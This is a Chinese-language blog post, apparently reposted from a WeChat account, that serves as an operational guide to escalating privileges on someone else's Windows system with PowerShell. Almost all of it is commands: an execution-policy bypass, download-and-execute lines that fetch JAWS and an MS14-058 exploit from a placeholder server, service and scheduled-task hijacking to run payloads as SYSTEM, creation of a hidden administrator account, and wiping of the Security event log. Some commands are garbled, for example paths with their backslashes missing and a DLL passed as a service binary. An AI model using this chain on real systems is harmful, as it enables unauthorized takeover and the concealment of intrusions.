PowerShell权限提升操作指南

admin
admin
admin
145368
文章
119
评论
2025年6月7日13:04:19评论11 views字数 2345阅读7分49秒阅读模式
PowerShell权限提升操作指南
一、环境准备阶段
1.获取基础执行权限
需要先拥有普通用户权限的PowerShell执行环境。也就是说你要在对方系统里至少有一个普通用户可以登录,并拥有PowerShell执行环境。
2.检查当前执行策略
🥛

Get-ExecutionPolicy

详细介绍一下Get-ExecutionPolicy
执行策略类型
策略名称
安全等级 
说明
 Restricted
 最高 
禁止运行任何脚本(默认策略)
AllSigned 
仅允许数字签名过的脚本运行
RemoteSigned
本地脚本可直接运行,远程脚本需签名
Unrestricted 
允许所有脚本运行但会提示风险
Bypass
完全跳过策略检查(需管理员权限)
组策略设置会覆盖用户手动配置
查看全量策略
🏆

Get-ExecutionPolicy -List 

PowerShell权限提升操作指南
3.设置临时执行策略
🏆

Set-ExecutionPolicy Bypass -Scope Process -Force

该命令用于在当前PowerShell会话中临时绕过脚本执行限制,允许运行任意脚本文件(包括未签名和第三方脚本),但不会修改系统全局执行策略。
参数
作用
风险等级
Bypass
完全禁用执行策略警告和拦截机制
★★★★
-Scope
仅在当前终端会话生效
-Force
跳过确认提示强制执行
★★
二、权限确认
🥇

whoami /priv  # 查看当前用户权限
   systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  # 获取系统版本信息

OS Name:可能是OS 名称
OS Version:OS 版本
三、信息收集阶段
1.使用JAWS脚本探测
🍰

IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/jaws-enum.ps1') 
Invoke-JAWS -EnumAll  # 自动收集系统配置、服务、文件权限等关键信息4

New-Object Net.WebClient
创建一个 System.Net.WebClient 对象,这个对象可以用于与Web资源进行交互,包括从Web服务器下载数据
.DownloadString('http://<服务器>/jaws-enum.ps1') 
调用 WebClient 对象的 DownloadString 方法,从指定的URL(http://<服务器>/jaws-enum.ps1 )下载文件内容,并将其作为字符串返回。这里的 <服务器> 应该替换为实际的服务器地址
IEX
即 Invoke-Expression 的别名,它的作用是将字符串作为PowerShell命令来执行。所以,IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/jaws-enum.ps1') 就是把从指定URL下载的脚本内容当作PowerShell命令来执行
2.Sherlock漏洞检测
🏆

Import-Module .Sherlock.ps1    #将当前目录下名为 Sherlock.ps1 的脚本文件作为模块导入到当前的 PowerShell 会话中。
Find-AllVulns  # 检测系统已知漏洞(CVE编号)

四、常见提权路径操作
路径1:系统服务漏洞利用
检测可写服务路径
🎁

Get-WmiObject win32_service | Select-Object Name, PathName, State | Where-Object {$_.PathName -notlike "C:Windows*"}

💡

1.筛选逻辑

获取所有Windows服务信息(Win32_Service类)2
筛选PathName字段不以C:Windows开头的服务(通常为第三方或可疑服务)
2.输出内容  

显示服务名称、路径、运行状态三列Name | PathName | State

DLL劫持示例
⛱️

sc.exe  config "<漏洞服务名>" binPath= "C:exploitdllhijack.dll" 
sc.exe  stop "<漏洞服务名>"
sc.exe  start "<漏洞服务名>"  # 通过服务重启触发4

路径2:内核漏洞利用
MS14-058提权操作
📚

下载并执行EXP
IEX (New-Object Net.WebClient).DownloadString('http://<服务器>/ms14-058.ps1') 
Invoke-MS14058 -Command "net user hacker P@ssw0rd /add" 5

路径3:计划任务劫持
🥇

创建高权限任务
schtasks /create /tn "UpdateTask" /tr "C:exploitpayload.exe"  /sc onstart /ru SYSTEM /f 
触发执行
schtasks /run /tn "UpdateTask" 6

五、后渗透操作
权限维持
🏖️

创建隐藏管理员账户
New-LocalUser -Name "Support" -Password (ConvertTo-SecureString "P@ssw0rd123" -AsPlainText -Force) -FullName "IT Support" -Description "System support account"
Add-LocalGroupMember -Group "Administrators" -Member "Support" 2

痕迹清理
🏖️

Remove-ItemProperty -Path "HKLM:SOFTWAREMicrosoftWindowsCurrentVersionRun" -Name "恶意启动项"
Clear-EventLog -LogName Security 4

原文始发于微信公众号(运维星火燎原):PowerShell权限提升操作指南

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日13:04:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PowerShell权限提升操作指南https://cn-sec.com/archives/4143849.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息